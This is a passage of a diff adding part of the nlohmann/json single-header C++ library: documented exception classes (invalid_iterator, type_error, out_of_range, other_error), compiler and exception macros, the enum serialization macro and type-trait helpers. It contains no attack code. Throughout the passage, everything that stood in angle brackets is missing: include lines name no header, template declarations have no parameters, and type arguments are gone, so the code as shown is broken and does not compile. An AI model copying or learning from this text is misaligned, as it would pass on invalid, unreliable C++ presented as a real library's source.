indicating errors with iterators + + This exception is thrown if iterators passed to a library function do not match + the expected semantics. + + Exceptions have ids 2xx. + + name / id | example message | description + ----------------------------------- | --------------- | ------------------------- + json.exception.invalid_iterator.201 | iterators are not compatible | The iterators passed to constructor @ref basic_json(InputIT first, InputIT last) are not compatible, meaning they do not belong to the same container. Therefore, the range (@a first, @a last) is invalid. + json.exception.invalid_iterator.202 | iterator does not fit current value | In an erase or insert function, the passed iterator @a pos does not belong to the JSON value for which the function was called. It hence does not define a valid position for the deletion/insertion. + json.exception.invalid_iterator.203 | iterators do not fit current value | Either iterator passed to function @ref erase(IteratorType first, IteratorType last) does not belong to the JSON value from which values shall be erased. It hence does not define a valid range to delete values from. + json.exception.invalid_iterator.204 | iterators out of range | When an iterator range for a primitive type (number, boolean, or string) is passed to a constructor or an erase function, this range has to be exactly (@ref begin(), @ref end()), because this is the only way the single stored value is expressed. All other ranges are invalid. + json.exception.invalid_iterator.205 | iterator out of range | When an iterator for a primitive type (number, boolean, or string) is passed to an erase function, the iterator has to be the @ref begin() iterator, because it is the only way to address the stored value. All other iterators are invalid. + json.exception.invalid_iterator.206 | cannot construct with iterators from null | The iterators passed to constructor @ref basic_json(InputIT first, InputIT last) belong to a JSON null value and hence to not define a valid range. + json.exception.invalid_iterator.207 | cannot use key() for non-object iterators | The key() member function can only be used on iterators belonging to a JSON object, because other types do not have a concept of a key. + json.exception.invalid_iterator.208 | cannot use operator[] for object iterators | The operator[] to specify a concrete offset cannot be used on iterators belonging to a JSON object, because JSON objects are unordered. + json.exception.invalid_iterator.209 | cannot use offsets with object iterators | The offset operators (+, -, +=, -=) cannot be used on iterators belonging to a JSON object, because JSON objects are unordered. + json.exception.invalid_iterator.210 | iterators do not fit | The iterator range passed to the insert function are not compatible, meaning they do not belong to the same container. Therefore, the range (@a first, @a last) is invalid. + json.exception.invalid_iterator.211 | passed iterators may not belong to container | The iterator range passed to the insert function must not be a subrange of the container to insert to. + json.exception.invalid_iterator.212 | cannot compare iterators of different containers | When two iterators are compared, they must belong to the same container. + json.exception.invalid_iterator.213 | cannot compare order of object iterators | The order of object iterators cannot be compared, because JSON objects are unordered. + json.exception.invalid_iterator.214 | cannot get value | Cannot get value for iterator: Either the iterator belongs to a null value or it is an iterator to a primitive type (number, boolean, or string), but the iterator is different to @ref begin(). + + @liveexample{The following code shows how an `invalid_iterator` exception can be + caught.,invalid_iterator} + + @sa - @ref exception for the base class of the library exceptions + @sa - @ref parse_error for exceptions indicating a parse error + @sa - @ref type_error for exceptions indicating executing a member function with + a wrong type + @sa - @ref out_of_range for exceptions indicating access out of the defined range + @sa - @ref other_error for exceptions indicating other library errors + + @since version 3.0.0 + */ + class invalid_iterator : public exception + { + public: + static invalid_iterator create(int id_, const std::string& what_arg) + { + std::string w = exception::name("invalid_iterator", id_) + what_arg; + return invalid_iterator(id_, w.c_str()); + } + + private: + invalid_iterator(int id_, const char* what_arg) + : exception(id_, what_arg) {} + }; + + /*! + @brief exception indicating executing a member function with a wrong type + + This exception is thrown in case of a type error; that is, a library function is + executed on a JSON value whose type does not match the expected semantics. + + Exceptions have ids 3xx. + + name / id | example message | description + ----------------------------- | --------------- | ------------------------- + json.exception.type_error.301 | cannot create object from initializer list | To create an object from an initializer list, the initializer list must consist only of a list of pairs whose first element is a string. When this constraint is violated, an array is created instead. + json.exception.type_error.302 | type must be object, but is array | During implicit or explicit value conversion, the JSON type must be compatible to the target type. For instance, a JSON string can only be converted into string types, but not into numbers or boolean types. + json.exception.type_error.303 | incompatible ReferenceType for get_ref, actual type is object | To retrieve a reference to a value stored in a @ref basic_json object with @ref get_ref, the type of the reference must match the value type. For instance, for a JSON array, the @a ReferenceType must be @ref array_t &. + json.exception.type_error.304 | cannot use at() with string | The @ref at() member functions can only be executed for certain JSON types. + json.exception.type_error.305 | cannot use operator[] with string | The @ref operator[] member functions can only be executed for certain JSON types. + json.exception.type_error.306 | cannot use value() with string | The @ref value() member functions can only be executed for certain JSON types. + json.exception.type_error.307 | cannot use erase() with string | The @ref erase() member functions can only be executed for certain JSON types. + json.exception.type_error.308 | cannot use push_back() with string | The @ref push_back() and @ref operator+= member functions can only be executed for certain JSON types. + json.exception.type_error.309 | cannot use insert() with | The @ref insert() member functions can only be executed for certain JSON types. + json.exception.type_error.310 | cannot use swap() with number | The @ref swap() member functions can only be executed for certain JSON types. + json.exception.type_error.311 | cannot use emplace_back() with string | The @ref emplace_back() member function can only be executed for certain JSON types. + json.exception.type_error.312 | cannot use update() with string | The @ref update() member functions can only be executed for certain JSON types. + json.exception.type_error.313 | invalid value to unflatten | The @ref unflatten function converts an object whose keys are JSON Pointers back into an arbitrary nested JSON value. The JSON Pointers must not overlap, because then the resulting value would not be well defined. + json.exception.type_error.314 | only objects can be unflattened | The @ref unflatten function only works for an object whose keys are JSON Pointers. + json.exception.type_error.315 | values in object must be primitive | The @ref unflatten function only works for an object whose keys are JSON Pointers and whose values are primitive. + json.exception.type_error.316 | invalid UTF-8 byte at index 10: 0x7E | The @ref dump function only works with UTF-8 encoded strings; that is, if you assign a `std::string` to a JSON value, make sure it is UTF-8 encoded. | + json.exception.type_error.317 | JSON value cannot be serialized to requested format | The dynamic type of the object cannot be represented in the requested serialization format (e.g. a raw `true` or `null` JSON object cannot be serialized to BSON) | + + @liveexample{The following code shows how a `type_error` exception can be + caught.,type_error} + + @sa - @ref exception for the base class of the library exceptions + @sa - @ref parse_error for exceptions indicating a parse error + @sa - @ref invalid_iterator for exceptions indicating errors with iterators + @sa - @ref out_of_range for exceptions indicating access out of the defined range + @sa - @ref other_error for exceptions indicating other library errors + + @since version 3.0.0 + */ + class type_error : public exception + { + public: + static type_error create(int id_, const std::string& what_arg) + { + std::string w = exception::name("type_error", id_) + what_arg; + return type_error(id_, w.c_str()); + } + + private: + type_error(int id_, const char* what_arg) : exception(id_, what_arg) {} + }; + + /*! + @brief exception indicating access out of the defined range + + This exception is thrown in case a library function is called on an input + parameter that exceeds the expected range, for instance in case of array + indices or nonexisting object keys. + + Exceptions have ids 4xx. + + name / id | example message | description + ------------------------------- | --------------- | ------------------------- + json.exception.out_of_range.401 | array index 3 is out of range | The provided array index @a i is larger than @a size-1. + json.exception.out_of_range.402 | array index '-' (3) is out of range | The special array index `-` in a JSON Pointer never describes a valid element of the array, but the index past the end. That is, it can only be used to add elements at this position, but not to read it. + json.exception.out_of_range.403 | key 'foo' not found | The provided key was not found in the JSON object. + json.exception.out_of_range.404 | unresolved reference token 'foo' | A reference token in a JSON Pointer could not be resolved. + json.exception.out_of_range.405 | JSON pointer has no parent | The JSON Patch operations 'remove' and 'add' can not be applied to the root element of the JSON value. + json.exception.out_of_range.406 | number overflow parsing '10E1000' | A parsed number could not be stored as without changing it to NaN or INF. + json.exception.out_of_range.407 | number overflow serializing '9223372036854775808' | UBJSON and BSON only support integer numbers up to 9223372036854775807. | + json.exception.out_of_range.408 | excessive array size: 8658170730974374167 | The size (following `#`) of an UBJSON array or object exceeds the maximal capacity. | + json.exception.out_of_range.409 | BSON key cannot contain code point U+0000 (at byte 2) | Key identifiers to be serialized to BSON cannot contain code point U+0000, since the key is stored as zero-terminated c-string | + + @liveexample{The following code shows how an `out_of_range` exception can be + caught.,out_of_range} + + @sa - @ref exception for the base class of the library exceptions + @sa - @ref parse_error for exceptions indicating a parse error + @sa - @ref invalid_iterator for exceptions indicating errors with iterators + @sa - @ref type_error for exceptions indicating executing a member function with + a wrong type + @sa - @ref other_error for exceptions indicating other library errors + + @since version 3.0.0 + */ + class out_of_range : public exception + { + public: + static out_of_range create(int id_, const std::string& what_arg) + { + std::string w = exception::name("out_of_range", id_) + what_arg; + return out_of_range(id_, w.c_str()); + } + + private: + out_of_range(int id_, const char* what_arg) : exception(id_, what_arg) {} + }; + + /*! + @brief exception indicating other library errors + + This exception is thrown in case of errors that cannot be classified with the + other exception types. + + Exceptions have ids 5xx. + + name / id | example message | description + ------------------------------ | --------------- | ------------------------- + json.exception.other_error.501 | unsuccessful: {"op":"test","path":"/baz", "value":"bar"} | A JSON Patch operation 'test' failed. The unsuccessful operation is also printed. + + @sa - @ref exception for the base class of the library exceptions + @sa - @ref parse_error for exceptions indicating a parse error + @sa - @ref invalid_iterator for exceptions indicating errors with iterators + @sa - @ref type_error for exceptions indicating executing a member function with + a wrong type + @sa - @ref out_of_range for exceptions indicating access out of the defined range + + @liveexample{The following code shows how an `other_error` exception can be + caught.,other_error} + + @since version 3.0.0 + */ + class other_error : public exception + { + public: + static other_error create(int id_, const std::string& what_arg) + { + std::string w = exception::name("other_error", id_) + what_arg; + return other_error(id_, w.c_str()); + } + + private: + other_error(int id_, const char* what_arg) : exception(id_, what_arg) {} + }; + } // namespace detail +} // namespace nlohmann + +// #include + + +#include // pair + +// This file contains all internal macro definitions +// You MUST include macro_unscope.hpp at the end of json.hpp to undef all of them + +// exclude unsupported compilers +#if !defined(JSON_SKIP_UNSUPPORTED_COMPILER_CHECK) +#if defined(__clang__) +#if (__clang_major__ * 10000 + __clang_minor__ * 100 + __clang_patchlevel__) < 30400 +#error "unsupported Clang version - see https://github.com/nlohmann/json#supported-compilers" +#endif +#elif defined(__GNUC__) && !(defined(__ICC) || defined(__INTEL_COMPILER)) +#if (__GNUC__ * 10000 + __GNUC_MINOR__ * 100 + __GNUC_PATCHLEVEL__) < 40800 +#error "unsupported GCC version - see https://github.com/nlohmann/json#supported-compilers" +#endif +#endif +#endif + +// C++ language standard detection +#if (defined(__cplusplus) && __cplusplus >= 201703L) || (defined(_HAS_CXX17) && _HAS_CXX17 == 1) // fix for issue #464 +#define JSON_HAS_CPP_17 +#define JSON_HAS_CPP_14 +#elif (defined(__cplusplus) && __cplusplus >= 201402L) || (defined(_HAS_CXX14) && _HAS_CXX14 == 1) +#define JSON_HAS_CPP_14 +#endif + +// disable float-equal warnings on GCC/clang +#if defined(__clang__) || defined(__GNUC__) || defined(__GNUG__) +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wfloat-equal" +#endif + +// disable documentation warnings on clang +#if defined(__clang__) +#pragma GCC diagnostic push +#pragma GCC diagnostic ignored "-Wdocumentation" +#endif + +// allow for portable deprecation warnings +#if defined(__clang__) || defined(__GNUC__) || defined(__GNUG__) +#define JSON_DEPRECATED __attribute__((deprecated)) +#elif defined(_MSC_VER) +#define JSON_DEPRECATED __declspec(deprecated) +#else +#define JSON_DEPRECATED +#endif + +// allow for portable nodiscard warnings +#if defined(__has_cpp_attribute) +#if __has_cpp_attribute(nodiscard) +#if defined(__clang__) && !defined(JSON_HAS_CPP_17) // issue #1535 +#define JSON_NODISCARD +#else +#define JSON_NODISCARD [[nodiscard]] +#endif +#elif __has_cpp_attribute(gnu::warn_unused_result) +#define JSON_NODISCARD [[gnu::warn_unused_result]] +#else +#define JSON_NODISCARD +#endif +#else +#define JSON_NODISCARD +#endif + +// allow to disable exceptions +#if (defined(__cpp_exceptions) || defined(__EXCEPTIONS) || defined(_CPPUNWIND)) && !defined(JSON_NOEXCEPTION) +#define JSON_THROW(exception) throw exception +#define JSON_TRY try +#define JSON_CATCH(exception) catch(exception) +#define JSON_INTERNAL_CATCH(exception) catch(exception) +#else +#include +#define JSON_THROW(exception) std::abort() +#define JSON_TRY if(true) +#define JSON_CATCH(exception) if(false) +#define JSON_INTERNAL_CATCH(exception) if(false) +#endif + +// override exception macros +#if defined(JSON_THROW_USER) +#undef JSON_THROW +#define JSON_THROW JSON_THROW_USER +#endif +#if defined(JSON_TRY_USER) +#undef JSON_TRY +#define JSON_TRY JSON_TRY_USER +#endif +#if defined(JSON_CATCH_USER) +#undef JSON_CATCH +#define JSON_CATCH JSON_CATCH_USER +#undef JSON_INTERNAL_CATCH +#define JSON_INTERNAL_CATCH JSON_CATCH_USER +#endif +#if defined(JSON_INTERNAL_CATCH_USER) +#undef JSON_INTERNAL_CATCH +#define JSON_INTERNAL_CATCH JSON_INTERNAL_CATCH_USER +#endif + +// manual branch prediction +#if defined(__clang__) || defined(__GNUC__) || defined(__GNUG__) +#define JSON_LIKELY(x) __builtin_expect(x, 1) +#define JSON_UNLIKELY(x) __builtin_expect(x, 0) +#else +#define JSON_LIKELY(x) x +#define JSON_UNLIKELY(x) x +#endif + +/*! +@brief macro to briefly define a mapping between an enum and JSON +@def NLOHMANN_JSON_SERIALIZE_ENUM +@since version 3.4.0 +*/ +#define NLOHMANN_JSON_SERIALIZE_ENUM(ENUM_TYPE, ...) \ + template \ + inline void to_json(BasicJsonType& j, const ENUM_TYPE& e) \ + { \ + static_assert(std::is_enum::value, #ENUM_TYPE " must be an enum!"); \ + static const std::pair m[] = __VA_ARGS__; \ + auto it = std::find_if(std::begin(m), std::end(m), \ + [e](const std::pair& ej_pair) -> bool \ + { \ + return ej_pair.first == e; \ + }); \ + j = ((it != std::end(m)) ? it : std::begin(m))->second; \ + } \ + template \ + inline void from_json(const BasicJsonType& j, ENUM_TYPE& e) \ + { \ + static_assert(std::is_enum::value, #ENUM_TYPE " must be an enum!"); \ + static const std::pair m[] = __VA_ARGS__; \ + auto it = std::find_if(std::begin(m), std::end(m), \ + [j](const std::pair& ej_pair) -> bool \ + { \ + return ej_pair.second == j; \ + }); \ + e = ((it != std::end(m)) ? it : std::begin(m))->first; \ + } + +// Ugly macros to avoid uglier copy-paste when specializing basic_json. They +// may be removed in the future once the class is split. + +#define NLOHMANN_BASIC_JSON_TPL_DECLARATION \ + template class ObjectType, \ + template class ArrayType, \ + class StringType, class BooleanType, class NumberIntegerType, \ + class NumberUnsignedType, class NumberFloatType, \ + template class AllocatorType, \ + template class JSONSerializer> + +#define NLOHMANN_BASIC_JSON_TPL \ + basic_json + +// #include + + +#include // not +#include // size_t +#include // conditional, enable_if, false_type, integral_constant, is_constructible, is_integral, is_same, remove_cv, remove_reference, true_type + +namespace nlohmann +{ + namespace detail + { + // alias templates to reduce boilerplate + template + using enable_if_t = typename std::enable_if::type; + + template + using uncvref_t = typename std::remove_cv::type>::type; + + // implementation of C++14 index_sequence and affiliates + // source: https://stackoverflow.com/a/32223343 + template + struct index_sequence + { + using type = index_sequence; + using value_type = std::size_t; + static constexpr std::size_t size() noexcept + { + return sizeof...(Ints); + } + }; + + template + struct merge_and_renumber; + + template + struct merge_and_renumber, index_sequence> + : index_sequence < I1..., (sizeof...(I1) + I2)... > {}; + + template + struct make_index_sequence + : merge_and_renumber < typename make_index_sequence < N / 2 >::type, + typename make_index_sequence < N - N / 2 >::type > {}; + + template<> struct make_index_sequence<0> : index_sequence<> {}; + template<> struct make_index_sequence<1> : index_sequence<0> {}; + + template + using index_sequence_for = make_index_sequence; + + // dispatch utility (taken from ranges-v3) + template struct priority_tag : priority_tag < N - 1 > {}; + template<> struct priority_tag<0> {}; + + // taken from ranges-v3 + template + struct static_const + { + static constexpr T value{}; + }; + + template + constexpr T static_const::value; + } // namespace detail +} // namespace nlohmann + +// #include + + +#include // not +#include // numeric_limits +#include // false_type, is_constructible, is_integral, is_same, true_type +#include // declval + +// #include + + +#include // random_access_iterator_tag + +// #include + + +namespace nlohmann +{ + namespace detail + { + template struct make_void + { + using type = void; + }; + template using void_t = typename make_void::type; + } // namespace detail +} // namespace nlohmann + +// #include + + +namespace nlohmann +{ + namespace detail + { + template + struct iterator_types {}; + + template + struct iterator_types < + It, + void_t> + { + using difference_type = typename It::difference_type; + using value_type = typename It::value_type; + using pointer = typename It::pointer; + using reference = typename It::reference; + using iterator_category = typename It::iterator_category; + }; + + // This is required as some compilers implement std::iterator_traits in a way that + // doesn't work with SFINAE. See https://github.com/nlohmann/json/issues/1341. + template + struct iterator_traits + { + }; + + template + struct iterator_traits < T, enable_if_t < !std::is_pointer::value >> + : iterator_types + { + }; + + template + struct iterator_traits::value>> + { + using iterator_category = std::random_access_iterator_tag; + using value_type = T; + using difference_type = ptrdiff_t; + using pointer = T * ; + using reference = T & ; + }; + } // namespace detail +} // namespace nlohmann + +// #include + +// #include + +// #include + + +#include + +// #include + + +// http://en.cppreference.com/w/cpp/experimental/is_detected +namespace nlohmann +{ + namespace detail + { + struct nonesuch + { + nonesuch() = delete; + ~nonesuch() = delete; + nonesuch(nonesuch const&) = delete; + nonesuch(nonesuch const&&) = delete; + void operator=(nonesuch const&) = delete; + void operator=(nonesuch&&) = delete; + }; + + template class Op, + class... Args> + struct detector + { + using value_t = std::false_type; + using type = Default; + }; + + template class Op, class... Args> + struct detector>, Op, Args...> + { + using value_t = std::true_type; + using type = Op; + }; + + template